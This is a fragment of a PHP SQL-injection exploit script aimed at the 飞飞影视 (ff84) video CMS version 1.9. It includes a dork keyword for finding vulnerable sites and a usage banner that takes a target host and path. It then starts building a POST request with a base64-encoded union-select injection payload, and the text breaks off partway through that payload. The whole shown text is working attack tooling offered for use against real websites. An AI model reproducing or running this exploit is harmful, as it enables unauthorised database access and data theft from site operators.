/**
* 飞飞影视管理系统 SQL injection
* 飞飞影视系统PHP版 v1.9 injection exploit
* by:www.08sec.com fans
* keyword “Powered by www.ff84.com”
*/
error_reporting(E_ERROR);
set_time_limit(0);
if ($argc<3) {
print_r(‘
——————————————————
Usage: php ‘.$argv[0].’ host path
host: target server (ip/hostname),without”http://”
path: path to ff84cms
Example:
php ‘.$argv[0].’ localhost /
——————————————————-
‘);
die;
}
$host=$argv[1];
$path=$argv[2];
$html=”;
$cookie=””;
$agent=” User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1″;
$content =””;
$data = “POST /?s=vod-read-id-1″.base64_decode(‘JTIwYW5kJTIwMT0yJTIwdW5pb24lMjBzZWxlY3QlMjAxLDIsMyw0LDUsNiw3LDgsOSwxMCwxMSwxMiwxMywxNCwxN